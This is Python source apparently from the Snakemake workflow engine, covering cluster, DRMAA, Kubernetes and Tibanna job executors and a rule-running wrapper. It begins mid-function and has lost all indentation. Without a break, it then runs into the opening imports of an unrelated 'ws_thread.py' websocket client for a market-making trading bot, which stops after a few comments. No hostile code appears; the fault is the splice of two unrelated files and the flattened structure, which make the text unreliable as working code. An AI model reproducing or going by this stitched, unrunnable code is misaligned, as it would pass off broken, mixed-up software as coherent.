# logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
latency_wait=3,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.wait(
active_job.jobid, drmaa.Session.TIMEOUT_NO_WAIT
)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
# job exited
os.remove(active_job.jobscript)
if (
not retval.wasAborted
and retval.hasExited
and retval.exitStatus == 0
):
active_job.callback(active_job.job)
else:
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
"""Change working directory in execution context if provided."""
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
exec_job = (
"cp -rf /source/. . && "
"snakemake {target} --snakefile {snakefile} "
"--force -j{cores} --keep-target-files --keep-remote "
"--latency-wait {latency_wait} --scheduler {workflow.scheduler_type} "
" --attempt {attempt} {use_threads} --max-inventory-time 0 "
"--wrapper-prefix {workflow.wrapper_prefix} "
"{overwrite_config} {printshellcmds} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
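# The "cp -rf /source/. ." prefix copies the workflow sources into the pod's
# working directory; they are shipped as a Kubernetes secret (see register_secret)
# and mounted at /source in run().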
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=10,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
# The kubernetes API can't create secret files larger than 1MB.
source_file_size = os.path.getsize(f)
max_file_size = 1048576
if source_file_size > max_file_size:
logger.warning(
"Skipping the source file {f}. Its size {source_file_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f, source_file_size=source_file_size
)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
# Some files are smaller than 1MB but grow larger after being base64 encoded.
# We should exclude them as well, otherwise the Kubernetes API will complain.
encoded_contents = base64.b64encode(content.read()).decode()
encoded_size = len(encoded_contents)
if encoded_size > 1048576:
logger.warning(
"Skipping the source file {f} for secret key {key}. "
"Its base64 encoded size {encoded_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f,
source_file_size=source_file_size,
key=key,
encoded_size=encoded_size,
)
)
continue
self.secret_files[key] = f
secret.data[key] = encoded_contents
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
# Test if the total size of the configMap exceeds 1MB
config_map_size = sum(
[len(base64.b64decode(v)) for k, v in secret.data.items()]
)
if config_map_size > 1048576:
logger.warning(
"The total size of the included files and other Kubernetes secrets "
"is {}, exceeding the 1MB limit.\n".format(config_map_size)
)
logger.warning(
"The following are the largest files. Consider removing some of them "
"(you need remove at least {} bytes):".format(config_map_size - 1048576)
)
entry_sizes = {
self.secret_files[k]: len(base64.b64decode(v))
for k, v in secret.data.items()
if k in self.secret_files
}
for k, v in sorted(entry_sizes.items(), key=lambda item: item[1])[:-6:-1]:
logger.warning(" * File: {k}, original size: {v}".format(k=k, v=v))
raise WorkflowError("ConfigMap too large")
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
safe_delete_secret = lambda: self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
self._kubernetes_retry(safe_delete_secret)
# In rare cases, deleting a pod may raise a 404 NotFound error.
def safe_delete_pod(self, jobid, ignore_not_found=True):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
try:
self.kubeapi.delete_namespaced_pod(jobid, self.namespace, body=body)
except kubernetes.client.rest.ApiException as e:
if e.status == 404 and ignore_not_found:
# Can't find the pod. Maybe it's already been
# destroyed. Proceed with a warning message.
logger.warning(
"[WARNING] 404 not found when trying to delete the pod: {jobid}\n"
"[WARNING] Ignore this error\n".format(jobid=jobid)
)
else:
raise e
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
func = lambda: self.safe_delete_pod(j.jobid, ignore_not_found=True)
self._kubernetes_retry(func)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads="--force-use-threads" if not job.is_group() else "",
)
# Kubernetes silently does not submit a job if the name is too long
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir"),
kubernetes.client.V1VolumeMount(name="source", mount_path="/source"),
]
body.spec = kubernetes.client.V1PodSpec(containers=[container])
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
# Running in privileged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
# Sometimes, certain k8s requests throw kubernetes.client.rest.ApiException
# Solving this issue requires reauthentication, as _kubernetes_retry shows
# However, reauthentication itself, under rare conditions, may also throw
# errors such as:
# kubernetes.client.exceptions.ApiException: (409), Reason: Conflict
#
# This error does not indicate anything wrong with the k8s cluster, and users can
# safely ignore it.
def _reauthenticate_and_retry(self, func=None):
import kubernetes
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("Trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
try:
self.register_secret()
except kubernetes.client.rest.ApiException as e:
if e.status == 409 and e.reason == "Conflict":
logger.warning("409 conflict ApiException when registering secrets")
logger.warning(e)
else:
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
if func:
return func()
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
return self._reauthenticate_and_retry(func)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
logger.info(
"Request timed out! "
"Check your connection to the Kubernetes master. "
"The workflow will pause for 5 minutes to allow any update operations to complete."
)
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8s cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
func = lambda: self.safe_delete_pod(
j.jobid, ignore_not_found=True
)
self._kubernetes_retry(func)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.main_snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
exec_job = (
"snakemake {target} --snakefile {snakefile} "
"--force -j{cores} --keep-target-files --keep-remote "
"--latency-wait 0 --scheduler {workflow.scheduler_type} "
"--attempt 1 {use_threads} --max-inventory-time 0 "
"{overwrite_config} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_get_default_resources_args=True,
)
self.container_image = container_image or get_container_image()
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
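# Example (hypothetical): with default_remote_prefix "mybucket/run1",
#   "mybucket/run1/data/sample.txt" -> "data/sample.txt"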
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def handle_remote(self, target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
def add_command(self, job, tibanna_args, tibanna_config):
# snakefile, with file name remapped
snakefile_fname = tibanna_args.snakemake_main_filename
# targets, with file name remapped
targets = job.get_targets()
if not isinstance(targets, list):
targets = [targets]
targets_default = " ".join([self.handle_remote(t) for t in targets])
# use_threads
use_threads = "--force-use-threads" if not job.is_group() else ""
# format command
command = self.format_job_pattern(
self.exec_job,
job,
target=targets_default,
snakefile=snakefile_fname,
use_threads=use_threads,
cores=tibanna_config["cpu"],
)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
# Local snakemake command here must be run with --default-remote-prefix
# and --default-remote-provider (forced) but on VM these options will be removed.
# The snakemake on the VM will consider these input and output as not remote.
# The files are transferred to the container by Tibanna before running snakemake.
# In short, the paths on VM must be consistent with what's in Snakefile.
# but the actual location of the files is on the S3 bucket/prefix.
# This mapping info must be passed to Tibanna.
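# Example (hypothetical paths): an input "mybucket/run1/data/a.txt" ends up as
#   input_source["file:///data1/snakemake/data/a.txt"] = "s3://mybucket/run1/data/a.txt"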
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow the use of callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
basedir,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- list of input files
output -- list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
# Determine whether to benchmark this process itself or not at all.
# We benchmark this process unless the execution is done through the
# ``shell:``, ``script:``, or ``wrapper:`` stanza (in that case the
# benchmarking is started in the child process; see below).
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
basedir,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
basedir,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
basedir,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt so that the scheduler records an error,
# but do not treat it as a rule failure here.
raise e
except (Exception, BaseException) as ex:
log_verbose_traceback(ex)
# this ensures that exception can be re-raised in the parent thread
lineno, file = get_exception_origin(ex, linemaps)
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
# ws_thread.py
import sys
import websocket
import threading
import traceback
import ssl
from time import sleep
import json
import decimal
import logging
import hashlib  # used for the websocket auth signature in connect()
import hmac
import time
from market_maker.settings import settings
from market_maker.auth.APIKeyAuth import generate_expires, generate_signature
from market_maker.auth.APIKeyAuthWithExpires import *
from market_maker.utils.log import setup_custom_logger
from market_maker.utils.math import toNearest
from future.utils import iteritems
from future.standard_library import hooks
with hooks(): # Python 2/3 compat
from urllib.parse import urlparse, urlunparse
# Connects to GTE websocket for streaming realtime data.
# The Marketmaker still interacts with this as if it were a REST Endpoint, but now it can get
# much more realtime data without heavily polling the API.
#
# The Websocket offers a bunch of data as raw properties right on the object.
